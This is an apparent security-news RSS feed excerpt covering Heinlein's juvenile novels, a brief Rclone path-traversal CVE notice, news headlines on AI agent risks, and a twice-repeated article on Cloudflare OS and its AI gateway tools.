<li><em><a href="https://en.wikipedia.org/wiki/Space_Cadet" data-type="link" data-id="https://en.wikipedia.org/wiki/Space_Cadet" target="_blank" rel="noreferrer noopener">Space Cadet (1948)</a></em> – This was in part the inspiration for the <em><a href="https://en.wikipedia.org/wiki/Tom_Corbett,_Space_Cadet_(TV_series)" data-type="link" data-id="https://en.wikipedia.org/wiki/Tom_Corbett,_Space_Cadet_(TV_series)" target="_blank" rel="noreferrer noopener">Tom Corbett</a></em> franchise, which licensed the name Space Cadet from Heinlein. It is about a young man who is accepted to the Academy for the Space Patrol. It follows him through his education in the Academy, and then into his first mission after graduating. This holds up better than the previous novel. And it is tied back to the story <em>The Long Watch</em> from the Future History. Part of the story takes place on an inhabited Venus that is cloudy and swampy.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Red_Planet_(novel)" data-type="link" data-id="https://en.wikipedia.org/wiki/Red_Planet_(novel)" target="_blank" rel="noreferrer noopener">Red Planet (1949)</a></em> – This is set on Mars, as it is also portrayed in <em><a href="https://en.wikipedia.org/wiki/Stranger_in_a_Strange_Land" data-type="link" data-id="https://en.wikipedia.org/wiki/Stranger_in_a_Strange_Land" target="_blank" rel="noreferrer noopener">Stranger In A Strange Land (1961)</a></em>. Mars is inhabited by native Martians, but also by human colonists. It has the canals, and with seasonal changes the colonists migrate from north to south and back. A pair of teenage boys get caught up in a revolution when the evil corporation that controls the colony pushes the colonists too far. In the end you wish there really were canals and Martians.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Farmer_in_the_Sky" data-type="link" data-id="https://en.wikipedia.org/wiki/Farmer_in_the_Sky" target="_blank" rel="noreferrer noopener">Farmer In The Sky (1950)</a></em> – This is one of the best, as seen by the Retro Hugo this novel won in 2000. Jupiter’s moon Ganymede is being terraformed because Earth is overcrowded and food is rationed. A teenage boy and his family emigrate to Ganymede and try to make a life there, which they eventually succeed in doing. <em>The Green Hills of Earth</em> is mentioned here, tying this into the future History. There are frequent references to the Boy Scouts, due to the fact that the story ran as a serial in <em><a href="https://en.wikipedia.org/wiki/Scout_Life" data-type="link" data-id="https://en.wikipedia.org/wiki/Scout_Life" target="_blank" rel="noreferrer noopener">Boy’s Life</a></em> magazine.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Between_Planets" data-type="link" data-id="https://en.wikipedia.org/wiki/Between_Planets" target="_blank" rel="noreferrer noopener">Between Planets (1951)</a></em> – A teenage boy is caught up in interplanetary intrigue. Venus and Mars have colonies, but Earth is trying to control them too much. So revolution is on the menu. This is clearly patterned in the colonial wars of the 18th and 19th centuries, such as the American Revolution against England. By this point the so-called “Juveniles” are really having more adult content, and reviewers re starting to rate them in comparison with adult science fiction. This novel was also first serialized in <em>Boy’s Life</em> magazine.</li>

<li>T<em><a href="https://en.wikipedia.org/wiki/The_Rolling_Stones_(novel)" data-type="link" data-id="https://en.wikipedia.org/wiki/The_Rolling_Stones_(novel)" target="_blank" rel="noreferrer noopener">he Rolling Stones (1952)</a></em> – Here we have teenage twin boys, Castor and Pollux, as the protagonists. They and their family live on the Moon, but decide to travel, so this novel is a kind of travelogue as they go to Mars, then to the Asteroid belt. The grandmother, Hazel Stone, appears in Heinlein’s later works as well. One interesting episode in this story involves “martian flat cats”, which are furry, lovable, and reproduce like mad with the right conditions. If this sound like Star Trek’s Tribbles, that is also what the Star Trek producers thought, so they got permission from Heinlein to use the idea.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Starman_Jones" data-type="link" data-id="https://en.wikipedia.org/wiki/Starman_Jones" target="_blank" rel="noreferrer noopener">Starman Jones (1953)</a></em> – We are now further into the future, and the human race is exploring the stars. Unfortunately, very restrictive guilds closely control who can participate in this. A teenage boy named Max, who happens to have an eidetic memory, has memorized the Astrogation tables from his uncle’s books, and wants to join the Guild, but is turned down. He lies his way onboard a ship, and through a series of events becomes the only one who can guide the ship home.</li>

<li><em><a href="https://en.wikipedia.org/wiki/The_Star_Beast_(novel)" data-type="link" data-id="https://en.wikipedia.org/wiki/The_Star_Beast_(novel)" target="_blank" rel="noreferrer noopener">The Star Beast (1954)</a></em> – A teenage boy has an alien “pet” his great-grandfather had brought back that has grown very large, and is considered a nuisance. A court decides the beast must be killed, but that proves easier to say than to do. It appears that the beast isn’t even aware that people are trying to kill it. Meanwhile, a powerful and hitherto unknown alien species demand the return of one of  their own, or they will destroy the Earth. Of course, it is this beast, who is actually royalty to the alien species. One interesting point is that government officials in this story are portrayed sympathetically as intelligent and dedicated.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Tunnel_in_the_Sky" data-type="link" data-id="https://en.wikipedia.org/wiki/Tunnel_in_the_Sky" target="_blank" rel="noreferrer noopener">Tunnel In The Sky (1955)</a></em> – In the future humanity is colonizing other planets, and a group of teenagers are taking their final survival test. They are sent to a planet and told that they have to survive for 10 days, But more than 10 days go by with no pickup, and they know something went wrong. So they have to establish their own little society to keep surviving. An interesting note is that the protagonist, Rod Walker, is black. It was never explicitly stated in the text, but Heinlein was firm in stating this. The clue is when the others expect Rod to end up with Caroline, who is explicitly stated to be black. This was Heinlein being subtly subversive. To have a black protagonist for a boy’s story in 1955 in America would be impossible. but Heinlein was completely anti-racist, among other things.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Time_for_the_Stars" data-type="link" data-id="https://en.wikipedia.org/wiki/Time_for_the_Stars" target="_blank" rel="noreferrer noopener">Time For The Stars (1956)</a></em> – This is a novel that takes Relativity seriously, which was not common in the 1950s. Researchers have discovered that some twins and triplets can communicate telepathically (and instantaneously), and so when a group of ships is sent out to explore other star systems, one twin is on the ship and the other remains on Earth to provide communication. The twin on Earth ages must faster than the one in space, of course, and eventually the Earth twin dies, But they discover that the connection sometimes passes down through the family, so the protagonist, Tom Bartlett, becomes connected first to his niece, then his grandniece, and finally his great-grandniece.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Citizen_of_the_Galaxy" data-type="link" data-id="https://en.wikipedia.org/wiki/Citizen_of_the_Galaxy" target="_blank" rel="noreferrer noopener">Citizen of the Galaxy (1957)</a></em> – This book is about a future slave trade, which Heinlein strongly hated. The protagonist is a boy who is bought at a slave auction by an old beggar, but the beggar is more than he seems. He is actually spying and gathering data regarding the slave trade. When discovered, he commits suicide, but he had prepared the young boy, Thorby, who then contacts the Free Traders who spirit him away. He has to adapt to this new society, but then is delivered to the Hegemonic Guard. It turns out his “father” (i.e. the man who bought him) was an officer in this organization. And when they run the background checks, they discover that he is the heir to a large conglomerate, and that conglomerate may be implicated in the slave trade.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Have_Space_Suit%E2%80%94Will_Travel" data-type="link" data-id="https://en.wikipedia.org/wiki/Have_Space_Suit%E2%80%94Will_Travel" target="_blank" rel="noreferrer noopener">Have Space Suit—Will Travel (1958)</a></em> – Clifford “Kip” Russell dreams of going to the Moon, and enters a contest with that as the top prize. Unfortunately, he wins the somewhat lesser prize of a used spacesuit. The first few chapters focus on him doing repairs and maintenance to make it functional again, and this displays Heinlein’s engineering background. It is more engaging than you might think. Then while wearing the spacesuit he receives a radio message, and he is kidnapped along with an alien called “The Mother Thing” and a young girl who is a genius. The kidnappers are a group of aliens who consider anyone not of their race to be animals. The trio first try to escape on the Moon, but are recaptured, then taken to Pluto, where they succeed in killing the alien kidnappers. Then they are taken to the Lesser Magellanic Cloud to be put on trial to determine if the human race should be allowed to live.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Starship_Troopers" data-type="link" data-id="https://en.wikipedia.org/wiki/Starship_Troopers" target="_blank" rel="noreferrer noopener">Starship Troopers (1959)</a></em> – This is the novel that Scribners rejected, and which brought the Juvenile series to an end. And it bears absolutely no resemblance at all to the movie, to the point that for Heinlein fans the word Verhoeven is considered an obscenity. A young man, Juan “Johnny” Rico joins the military, where he has to grow up and then take part in a war against an insectoid race, but that is all background really. The book is primarily a glorification of military service, which is not surprising given Heinlein’s background. And it focuses on a series of discussions under the heading of “History and Moral Philosophy”, which lets Heinlein expound on his values and beliefs. The novel won a Hugo, but it is an add one given that the plot is secondary to the philosophizing. One of the most controversial ideas is that in this society the right to vote is limited to people who have been in Federal Service. Heinlein said this didn’t have to be military, but the only ones we see are in fact military veterans.</li>
</ul>

<p>So, these are the Heinlein Juveniles. In my opinion, many of them are quite good reading for adults. The thing that separates them from adult novels in Heinlein’s body of work is the lack of any sex element. That would become prominent in Heinlein’s later adult novels, but it was not something you could put in a book aimed at teenagers, certainly not in the 1950s, and arguably the case today as well.</p>

<h3>Links</h3>
<ul>
<li><a href="https://en.wikipedia.org/wiki/Rocket_Ship_Galileo">https://en.wikipedia.org/wiki/Rocket_Ship_Galileo</a></li>
<li><a href="https://en.wikipedia.org/wiki/Destination_Moon_(film)">https://en.wikipedia.org/wiki/Destination_Moon_(film)</a></li>
<li><a href="https://en.wikipedia.org/wiki/Space_Cadet">https://en.wikipedia.org/wiki/Space_Cadet</a></li>
<li><a href="https://en.wikipedia.org/wiki/Tom_Corbett,_Space_Cadet_(TV_series)">https://en.wikipedia.org/wiki/Tom_Corbett,_Space_Cadet_(TV_series)</a></li>
<li><a href="https://en.wikipedia.org/wiki/Red_Planet_(novel)">https://en.wikipedia.org/wiki/Red_Planet_(novel)</a></li>
<li><a href="https://en.wikipedia.org/wiki/Stranger_in_a_Strange_Land">https://en.wikipedia.org/wiki/Stranger_in_a_Strange_Land</a></li>
<li><a href="https://en.wikipedia.org/wiki/Farmer_in_the_Sky">https://en.wikipedia.org/wiki/Farmer_in_the_Sky</a></li>
<li><a href="https://en.wikipedia.org/wiki/Scout_Life">https://en.wikipedia.org/wiki/Scout_Life</a></li>
<li><a href="https://en.wikipedia.org/wiki/Between_Planets">https://en.wikipedia.org/wiki/Between_Planets</a></li>
<li><a href="https://en.wikipedia.org/wiki/The_Rolling_Stones_(novel)">https://en.wikipedia.org/wiki/The_Rolling_Stones_(novel)</a></li>
<li><a href="https://en.wikipedia.org/wiki/Starman_Jones">https://en.wikipedia.org/wiki/Starman_Jones</a></li>
<li><a href="https://en.wikipedia.org/wiki/The_Star_Beast_(novel)">https://en.wikipedia.org/wiki/The_Star_Beast_(novel)</a></li>
<li><a href="https://en.wikipedia.org/wiki/Tunnel_in_the_Sky">https://en.wikipedia.org/wiki/Tunnel_in_the_Sky</a></li>
<li><a href="https://en.wikipedia.org/wiki/Time_for_the_Stars">https://en.wikipedia.org/wiki/Time_for_the_Stars</a></li>
<li><a href="https://en.wikipedia.org/wiki/Citizen_of_the_Galaxy">https://en.wikipedia.org/wiki/Citizen_of_the_Galaxy</a></li>
<li><a href="https://en.wikipedia.org/wiki/Have_Space_Suit%E2%80%94Will_Travel">https://en.wikipedia.org/wiki/Have_Space_Suit%E2%80%94Will_Travel</a></li>
<li><a href="https://en.wikipedia.org/wiki/Starship_Troopers">https://en.wikipedia.org/wiki/Starship_Troopers</a></li>
<li><a href="https://www.palain.com/science-fiction/the-golden-age/robert-a-heinlein/heinlein-the-juveniles/">https://www.palain.com/science-fiction/the-golden-age/robert-a-heinlein/heinlein-the-juveniles/</a></li>
</ul>

<p><a href="https://hackerpublicradio.org/eps/hpr4700/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-71313 | Rclone up to 1.74.x Local Backend backend/local/local.go filepath.Join path traversal (Nessus ID 333075)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Rclone up to 1.74.x. The impacted element is the function filepath.Join of the file backend/local/local.go of the component Local Backend. Performing a manipulation results in path traversal.

This vulnerability is known as CVE-...]]></description>
<link>https://tsecurity.de/de/3709324/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709324/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 03:30:50 +0200</pubDate>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/rclone">Rclone up to 1.74.x</a>. The impacted element is the function <code>filepath.Join</code> of the file <em>backend/local/local.go</em> of the component <em>Local Backend</em>. Performing a manipulation results in path traversal.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-71313">CVE-2026-71313</a>. Remote exploitation of the attack is possible. No exploit is available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI without adult supervision.]]></title>
<description><![CDATA[Meta’s AI models join the sandbox escape club. China’s telecom footprint in the U.S. may be larger than expected. The White House keeps its AI safety playbook under wraps. AI coding tools introduce new GitHub risks. ENISA expands its CVE role. A critical Paperclip flaw enables code execution. Cry...]]></description>
<link>https://tsecurity.de/de/3709269/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709269/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 02:50:22 +0200</pubDate>
<content:encoded><![CDATA[Meta’s AI models join the sandbox escape club. China’s telecom footprint in the U.S. may be larger than expected. The White House keeps its AI safety playbook under wraps. AI coding tools introduce new GitHub risks. ENISA expands its CVE role. A critical Paperclip flaw enables code execution. Crypto wallet fears fuel phishing attacks. Researchers uncover a backdoor in Chinese-made routers. The Snowflake hacker pleads guilty. Our guest is Dustin Childs, Head of Threat Awareness of TrendAI’s Zero Day Initiative, discussing the new Patch Tuesday era. AI takes your word for it.]]></content:encoded>
</item>
<item>
<title><![CDATA[ThreatsDay: KI-Agenten, Paketketten und One-Click-Kompromisse erhöhen Angriffsfläche]]></title>
<description><![CDATA[TEL AVIV / LONDON (IT BOLTWISE) – In dieser ThreatsDay-Runde zeigt sich, wie schnell Künstliche Intelligenz und Agenten-basierte Workflows neue Angriffsflächen schaffen. Forschende warnen, dass ein Repository in Coding-Agenten bereits vor der ersten Benutzeranfrage Code ausführen kann. Gleichzeit...]]></description>
<link>https://tsecurity.de/de/3709261/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709261/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 02:49:47 +0200</pubDate>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/08/threatsday-ki-agenten-paketketten-one-click-kompromisse.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/08/threatsday-ki-agenten-paketketten-one-click-kompromisse.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/08/threatsday-ki-agenten-paketketten-one-click-kompromisse-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/08/threatsday-ki-agenten-paketketten-one-click-kompromisse-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/08/threatsday-ki-agenten-paketketten-one-click-kompromisse-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/08/threatsday-ki-agenten-paketketten-one-click-kompromisse-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/08/threatsday-ki-agenten-paketketten-one-click-kompromisse-120x120.jpg 120w" sizes="auto, (max-width: 1024px) 100vw, 1024px">TEL AVIV / LONDON (IT BOLTWISE) – In dieser ThreatsDay-Runde zeigt sich, wie schnell Künstliche Intelligenz und Agenten-basierte Workflows neue Angriffsflächen schaffen. Forschende warnen, dass ein Repository in Coding-Agenten bereits vor der ersten Benutzeranfrage Code ausführen kann. Gleichzeitig treiben kompromittierte Paketketten und Phishing-PDFs die Automatisierung von Einfällen voran. Dazu kommt ein One-Click-Ansatz, der über Samsung-Design-Fehler […]</p>
<div><a href="https://www.it-boltwise.de/threatsday-ki-agenten-paketketten-und-one-click-kompromisse-erhoehen-angriffsflaeche.html">... den vollständigen Artikel <strong>»ThreatsDay: KI-Agenten, Paketketten und One-Click-Kompromisse erhöhen Angriffsfläche«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/threatsday-ki-agenten-paketketten-und-one-click-kompromisse-erhoehen-angriffsflaeche.html">ThreatsDay: KI-Agenten, Paketketten und One-Click-Kompromisse erhöhen Angriffsfläche</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloudflare wants to provide the operating system for the AI-first enterprise]]></title>
<description><![CDATA[Traditional operating systems (OS) were built to manage hardware, files, apps, and users on a device, but Cloudflare says the agentic AI era requires a whole new format.



The company this week announced Cloudflare OS, which connects AI agents, enterprise data and context, internal systems, and ...]]></description>
<link>https://tsecurity.de/de/3709231/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709231/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 02:38:25 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Traditional operating systems (OS) were built to manage hardware, files, apps, and users on a device, but Cloudflare says the agentic AI era requires a whole new format.</p>



<p class="wp-block-paragraph">The company this week announced <a href="https://www.cloudflare.com/press/press-releases/2026/cloudflare-os-is-the-first-ai-workspace-built-around-how-companies-actually-work/" target="_blank" rel="noreferrer noopener">Cloudflare OS</a>, which connects AI agents, enterprise data and context, internal systems, and workflows together in one secure workspace. It is open source and browser-based, sparing companies the need to build all-new infrastructure.</p>



<p class="wp-block-paragraph">The OS is launching alongside several other new security, identity, spending, and user insight tools that Cloudflare has built for the <a href="https://www.infoworld.com/article/2255318/what-is-cloud-native-the-modern-way-to-develop-software.html" target="_blank">AI-based workplace</a>.</p>



<p class="wp-block-paragraph">“Cloudflare OS isn’t a traditional desktop OS,” said <a href="https://www.linkedin.com/in/ritakozlov/" target="_blank" rel="noreferrer noopener">Rita Kozlov</a>, VP of product at Cloudflare. “It reimagines the workplace computing environment for AI.”</p>



<h2 class="wp-block-heading">Open source OS runs in a browser</h2>



<p class="wp-block-paragraph">Cloudflare OS serves as a secure, AI-equipped workspace that is plugged into internal company systems. Available now through Cloudflare’s open source repository, it is accessible directly in a browser, and runs inside an enterprise’s Cloudflare account.</p>



<p class="wp-block-paragraph">“It is a browser-based workspace that begins with a conversation,” Kozlov explained. Users can ask an agent to research, create slides, spreadsheets, and documents, build full-stack apps, or automate workflows without the need for a terminal. Those outputs are then shareable, but kept in isolated databases with access controls.</p>



<p class="wp-block-paragraph">Enterprises will soon be able to access the OS directly through Cloudflare or via a “select group” of partners that will build tailored offerings on Cloudflare’s architecture, the company says. Because it is open source, organizational processes, internal system connections, and context aren’t locked into a vendor product or AI model provider. Customers can use whatever models they choose.</p>



<p class="wp-block-paragraph">Cloudflare OS is built on Cloudflare Workers, <a href="https://www.infoworld.com/article/4149869/cloudflare-launches-dynamic-workers-for-ai-agent-execution.html" target="_blank">Dynamic Workers</a>, Durable Objects, and Access, the company’s zero trust network access (ZTNA) tool that verifies every user and request. Agents start with zero permissions by default and are only granted access to tools required for a specific task. Organizations configure their own Access policies, models, branding, skills, and integrations, Kozlov explained.</p>



<p class="wp-block-paragraph">Governed connectors known as gatekeepers give admins control over what AI can see, what it can change, and when the system needs human sign-off. They can also control budgets, set rate limits, and delegate tasks to different models.</p>



<p class="wp-block-paragraph">“Because <a href="https://www.infoworld.com/article/4165857/are-we-ready-to-give-ai-agents-the-keys-to-the-cloud-cloudflare-thinks-so.html" target="_blank">agents act on people’s behalf</a> and produce work others can access and modify, they require a new security model,” Kozlov said. Thus, Cloudflare OS tracks the resources an agent requires so the right access controls follow its work when it is shared.</p>



<p class="wp-block-paragraph">Cloudflare initially built the OS for internal use, and employees “across every team” use it daily. Kozlov estimated that, over the last 30 days, internal users have used it to create more than 4,000 apps, automations, and tools. Over that same period, she claimed, the company’s sales team saved an estimated 10,000 hours by automating previously manual tasks like territory planning and proposal creation.</p>



<p class="wp-block-paragraph">“We open sourced Cloudflare OS so any organization can build ‘Your Company OS,’” Kozlov said. Open source is critical because “you cannot put your company into software you do not own. Organizations need to be able to inspect the platform, customize it, connect their own systems, and make it their own,” she explained.</p>



<h2 class="wp-block-heading">A more cohesive bundle</h2>



<p class="wp-block-paragraph">Cloudflare deserves credit for packaging Cloudflare OS as an operating system, noted tech analyst <a href="https://ca.linkedin.com/in/carmi" target="_blank" rel="noreferrer noopener">Carmi Levy</a>.</p>



<p class="wp-block-paragraph">“This very much is not Windows, macOS, or Linux, and it isn’t an operating system by its common definition,” he said. “But Cloudflare’s use of this terminology implies familiarity to enterprise IT buyers.”</p>



<p class="wp-block-paragraph">This makes for an easier discussion as enterprises struggle to understand how to best incorporate AI-related platforms and workflows into infrastructure that wasn’t initially designed for it.</p>



<p class="wp-block-paragraph">Microsoft has marketed the combination of its Azure, Entra, Fabric, Windows, and Microsoft 365 offerings as an operating system of sorts, but hasn’t pulled all the pieces into a common brand, Levy said. And Google’s Gemini, Workspace, Vertex AI, and Cloud Run are “circling similar territory.”</p>



<p class="wp-block-paragraph">But, he noted, Cloudflare OS is “more cohesively bundled” and infrastructure-focused, offering a single pane of glass platform for buyers worried about stitching together otherwise disparate AI-aware networking pieces. The company recognizes that AI introduces new architectural realities such as inference and model routing “over and above” traditional OS core competencies.</p>



<p class="wp-block-paragraph">“While competing offerings generally leave the infrastructure heavy lifting to enterprise decision-makers, Cloudflare is marketing itself as a single-source vendor, which potentially frees IT planners from having to integrate all the AI pieces on their own,” Levy said.</p>



<p class="wp-block-paragraph">An infrastructure-first, application-agnostic approach means Cloudflare OS can coexist with whatever AI applications already exist in an enterprise, he said. It will “play nice” with OpenAI, Anthropic, Google, Microsoft, Meta, or open source layers, allowing employees to begin working in familiar workflows after sign-in.</p>



<p class="wp-block-paragraph">“Its open-source architecture also minimizes the potential for vendor lock-in as enterprises gradually figure out how to evolve their stacks to align with new AI-era realities,” Levy said.</p>



<h2 class="wp-block-heading">Managing identities and budgets for both humans and AI</h2>



<p class="wp-block-paragraph">As AI agents emerge across the enterprise, tracking their use can be challenging, causing problems from both a security and a spend standpoint. Along with Cloudflare OS, the company has launched a way to address this issue with its new <a href="https://www.cloudflare.com/press/press-releases/2026/cloudflare-gives-companies-full-visibility-to-audit-and-analyze-ai-use/" target="_blank" rel="noreferrer noopener">Identity-Aware AI Gateway</a>, now in beta.</p>



<p class="wp-block-paragraph">Also integrated with Access, the offering gives admins visibility into what users (both human and AI) are requesting from AI models. It allows security teams to set up custom domains in front of their gateways and replace shared API keys by integrating with their identity provider, like Okta or Entra, and ZTNA infrastructure, Cloudflare explained.</p>



<p class="wp-block-paragraph">Every request is tied to Access-verified identities, and enterprises can filter each user’s logs, analytics, and spend. IT teams can track redundancies, limit usage rates, and apply filters that strip out employee names, passwords, and other sensitive data before requests go to outside model providers.</p>



<p class="wp-block-paragraph">A companion feature, AI Spend, tracks every user’s behavior over time to create a baseline of normal AI usage. When spending deviates from that pattern, the system alerts the IT team.</p>



<p class="wp-block-paragraph">A new tab, User Insights, tracks cost and identifies over-spend caused by activities such as low cache-hit rates or oversized context windows. The capability scores sessions and compares them against account history using a 95th percentile session cost over the previous 30 days, Cloudflare product managers <a href="https://blog.cloudflare.com/author/ming-lu/" target="_blank" rel="noreferrer noopener">Ming Lu</a>, <a href="https://blog.cloudflare.com/author/kenny/" target="_blank" rel="noreferrer noopener">Kenny Johnson</a>, and <a href="https://blog.cloudflare.com/author/ayush/" target="_blank" rel="noreferrer noopener">Ayush Kumar</a> explain in a <a href="https://blog.cloudflare.com/identity-aware-ai-gateway/" target="_blank" rel="noreferrer noopener">blog post</a>. Anything above 2x an account’s 95th percentile is a “strong candidate for anomalous behavior.”</p>



<p class="wp-block-paragraph">For instance, one Cloudflare customer had an employee who left a rogue AI session running, generating a $30K bill. “User Insights helped them identify the problem and shut off access before the problem was further exacerbated,” Kozlov said.</p>



<p class="wp-block-paragraph">Cloudflare is also building prompt classification functionality that sorts requests into categories such as coding or writing. This can help enterprises understand what AI is being used for.</p>



<p class="wp-block-paragraph">“Once business traffic is separated from everything else, personal use becomes visible,” the project managers explained. “From the outside, someone running a side hustle on company time and someone quietly moving data out through a model look the same. Telling them apart is central to catching insider risk.”</p>



<h2 class="wp-block-heading">Looking at the bigger picture</h2>



<p class="wp-block-paragraph">Identity-Aware AI Gateway and AI Spend address the visibility problem that has dogged so many recent AI deployments where enterprises failed to monitor usage, Levy noted. Projects “crashed and burned” as users unwittingly blew through token allocations.</p>



<p class="wp-block-paragraph">These platforms provide single-point visibility into what is being used, how it’s being used, and where the potential lies for raising the productivity bar, he said. They overlay with existing models; in doing so, they enhance security with more precise control over resource allocations, and via automated anonymization protocols that prevent inadvertent sharing of sensitive data.</p>



<p class="wp-block-paragraph">Ultimately, he said, vendors who free IT from having to independently assemble the pieces of their own AI implementations, and who assist them with answers to AI-specific questions, “will gain advantage over vendors that aren’t looking at the bigger picture.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloudflare wants to provide the operating system for the AI-first enterprise]]></title>
<description><![CDATA[Traditional operating systems (OS) were built to manage hardware, files, apps, and users on a device, but Cloudflare says the agentic AI era requires a whole new format.



The company this week announced Cloudflare OS, which connects AI agents, enterprise data and context, internal systems, and ...]]></description>
<link>https://tsecurity.de/de/3709211/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709211/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 02:35:07 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Traditional operating systems (OS) were built to manage hardware, files, apps, and users on a device, but Cloudflare says the agentic AI era requires a whole new format.</p>



<p class="wp-block-paragraph">The company this week announced <a href="https://www.cloudflare.com/press/press-releases/2026/cloudflare-os-is-the-first-ai-workspace-built-around-how-companies-actually-work/" target="_blank" rel="noreferrer noopener">Cloudflare OS</a>, which connects AI agents, enterprise data and context, internal systems, and workflows together in one secure workspace. It is open source and browser-based, sparing companies the need to build all-new infrastructure.</p>



<p class="wp-block-paragraph">The OS is launching alongside several other new security, identity, spending, and user insight tools that Cloudflare has built for the <a href="https://www.infoworld.com/article/2255318/what-is-cloud-native-the-modern-way-to-develop-software.html" target="_blank">AI-based workplace</a>.</p>



<p class="wp-block-paragraph">“Cloudflare OS isn’t a traditional desktop OS,” said <a href="https://www.linkedin.com/in/ritakozlov/" target="_blank" rel="noreferrer noopener">Rita Kozlov</a>, VP of product at Cloudflare. “It reimagines the workplace computing environment for AI.”</p>



<h2 class="wp-block-heading">Open source OS runs in a browser</h2>



<p class="wp-block-paragraph">Cloudflare OS serves as a secure, AI-equipped workspace that is plugged into internal company systems. Available now through Cloudflare’s open source repository, it is accessible directly in a browser, and runs inside an enterprise’s Cloudflare account.</p>



<p class="wp-block-paragraph">“It is a browser-based workspace that begins with a conversation,” Kozlov explained. Users can ask an agent to research, create slides, spreadsheets, and documents, build full-stack apps, or automate workflows without the need for a terminal. Those outputs are then shareable, but kept in isolated databases with access controls.</p>



<p class="wp-block-paragraph">Enterprises will soon be able to access the OS directly through Cloudflare or via a “select group” of partners that will build tailored offerings on Cloudflare’s architecture, the company says. Because it is open source, organizational processes, internal system connections, and context aren’t locked into a vendor product or AI model provider. Customers can use whatever models they choose.</p>



<p class="wp-block-paragraph">Cloudflare OS is built on Cloudflare Workers, <a href="https://www.infoworld.com/article/4149869/cloudflare-launches-dynamic-workers-for-ai-agent-execution.html" target="_blank">Dynamic Workers</a>, Durable Objects, and Access, the company’s zero trust network access (ZTNA) tool that verifies every user and request. Agents start with zero permissions by default and are only granted access to tools required for a specific task. Organizations configure their own Access policies, models, branding, skills, and integrations, Kozlov explained.</p>



<p class="wp-block-paragraph">Governed connectors known as gatekeepers give admins control over what AI can see, what it can change, and when the system needs human sign-off. They can also control budgets, set rate limits, and delegate tasks to different models.</p>



<p class="wp-block-paragraph">“Because <a href="https://www.infoworld.com/article/4165857/are-we-ready-to-give-ai-agents-the-keys-to-the-cloud-cloudflare-thinks-so.html" target="_blank">agents act on people’s behalf</a> and produce work others can access and modify, they require a new security model,” Kozlov said. Thus, Cloudflare OS tracks the resources an agent requires so the right access controls follow its work when it is shared.</p>



<p class="wp-block-paragraph">Cloudflare initially built the OS for internal use, and employees “across every team” use it daily. Kozlov estimated that, over the last 30 days, internal users have used it to create more than 4,000 apps, automations, and tools. Over that same period, she claimed, the company’s sales team saved an estimated 10,000 hours by automating previously manual tasks like territory planning and proposal creation.</p>



<p class="wp-block-paragraph">“We open sourced Cloudflare OS so any organization can build ‘Your Company OS,’” Kozlov said. Open source is critical because “you cannot put your company into software you do not own. Organizations need to be able to inspect the platform, customize it, connect their own systems, and make it their own,” she explained.</p>



<h2 class="wp-block-heading">A more cohesive bundle</h2>



<p class="wp-block-paragraph">Cloudflare deserves credit for packaging Cloudflare OS as an operating system, noted tech analyst <a href="https://ca.linkedin.com/in/carmi" target="_blank" rel="noreferrer noopener">Carmi Levy</a>.</p>



<p class="wp-block-paragraph">“This very much is not Windows, macOS, or Linux, and it isn’t an operating system by its common definition,” he said. “But Cloudflare’s use of this terminology implies familiarity to enterprise IT buyers.”</p>



<p class="wp-block-paragraph">This makes for an easier discussion as enterprises struggle to understand how to best incorporate AI-related platforms and workflows into infrastructure that wasn’t initially designed for it.</p>



